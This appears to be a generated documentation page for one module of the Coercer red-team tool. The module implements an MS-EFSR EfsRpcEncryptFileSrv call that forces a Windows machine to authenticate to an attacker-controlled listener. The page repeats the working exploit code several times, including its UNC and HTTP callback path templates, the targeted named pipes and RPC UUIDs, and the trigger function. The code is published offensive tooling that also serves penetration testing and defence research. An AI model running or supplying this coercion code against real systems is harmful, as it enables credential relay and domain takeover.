coercer.methods.MS_EFSR.EfsRpcEncryptFileSrv

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcEncryptFileSrv.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
 14class _EfsRpcEncryptFileSrv(NDRCALL):
 15    """
 16    Structure to make the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 17    """
 18    opnum = 4
 19    structure = (
 20        ('FileName', WSTR),  # Type: wchar_t *
 21    )
 22
 23
 24class _EfsRpcEncryptFileSrvResponse(NDRCALL):
 25    """
 26    Structure to parse the response of the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 27    """
 28    structure = ()
 29
 30
 31class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
 32    """
 33    Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
 34
 35    Method found by:
 36     - [@topotam77](https://twitter.com/topotam77)
 37    """
 38
 39    exploit_paths = [
 40        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 41        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 43        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 44    ]
 45
 46    access = {
 47        "ncan_np": [
 48            {
 49                "namedpipe": r"\PIPE\efsrpc",
 50                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 51                "version": "1.0"
 52            },
 53            {
 54                "namedpipe": r"\PIPE\lsarpc",
 55                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 56                "version": "1.0"
 57            },
 58            {
 59                "namedpipe": r"\PIPE\samr",
 60                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 61                "version": "1.0"
 62            },
 63            {
 64                "namedpipe": r"\PIPE\lsass",
 65                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 66                "version": "1.0"
 67            },
 68            {
 69                "namedpipe": r"\PIPE\netlogon",
 70                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 71                "version": "1.0"
 72            },
 73        ],
 74        "ncacn_ip_tcp": [
 75            {
 76                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 77                "version": "1.0"
 78            },
 79            {
 80                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 81                "version": "1.0"
 82            }
 83        ]
 84    }
 85
 86    protocol = {
 87        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
 88        "shortname": "MS-EFSR"
 89    }
 90
 91    function = {
 92        "name": "EfsRpcEncryptFileSrv",
 93        "opnum": 4,
 94        "vulnerable_arguments": ["FileName"]
 95    }
 96
 97    def trigger(self, dcerpc_session, target):
 98        if dcerpc_session is not None:
 99            try:
100                request = _EfsRpcEncryptFileSrv()
101                request['FileName'] = self.path
102                resp = dcerpc_session.request(request)
103                return ""
104            except Exception as err:
105                return err
106        else:
107            print("[!] Error: dce is None, you must call connect() first.")
108            return None
class EfsRpcEncryptFileSrv(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 32class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
 33    """
 34    Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
 35
 36    Method found by:
 37     - [@topotam77](https://twitter.com/topotam77)
 38    """
 39
 40    exploit_paths = [
 41        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 44        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 45    ]
 46
 47    access = {
 48        "ncan_np": [
 49            {
 50                "namedpipe": r"\PIPE\efsrpc",
 51                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 52                "version": "1.0"
 53            },
 54            {
 55                "namedpipe": r"\PIPE\lsarpc",
 56                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 57                "version": "1.0"
 58            },
 59            {
 60                "namedpipe": r"\PIPE\samr",
 61                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 62                "version": "1.0"
 63            },
 64            {
 65                "namedpipe": r"\PIPE\lsass",
 66                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 67                "version": "1.0"
 68            },
 69            {
 70                "namedpipe": r"\PIPE\netlogon",
 71                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 72                "version": "1.0"
 73            },
 74        ],
 75        "ncacn_ip_tcp": [
 76            {
 77                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 78                "version": "1.0"
 79            },
 80            {
 81                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 82                "version": "1.0"
 83            }
 84        ]
 85    }
 86
 87    protocol = {
 88        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
 89        "shortname": "MS-EFSR"
 90    }
 91
 92    function = {
 93        "name": "EfsRpcEncryptFileSrv",
 94        "opnum": 4,
 95        "vulnerable_arguments": ["FileName"]
 96    }
 97
 98    def trigger(self, dcerpc_session, target):
 99        if dcerpc_session is not None:
100            try:
101                request = _EfsRpcEncryptFileSrv()
102                request['FileName'] = self.path
103                resp = dcerpc_session.request(request)
104                return ""
105            except Exception as err:
106                return err
107        else:
108            print("[!] Error: dce is None, you must call connect() first.")
109            return None

Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of MS-FSRVP Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcEncryptFileSrv', 'opnum': 4, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
 98    def trigger(self, dcerpc_session, target):
 99        if dcerpc_session is not None:
100            try:
101                request = _EfsRpcEncryptFileSrv()
102                request['FileName'] = self.path
103                resp = dcerpc_session.request(request)
104                return ""
105            except Exception as err:
106                return err
107        else:
108            print("[!] Error: dce is None, you must call connect() first.")
109            return None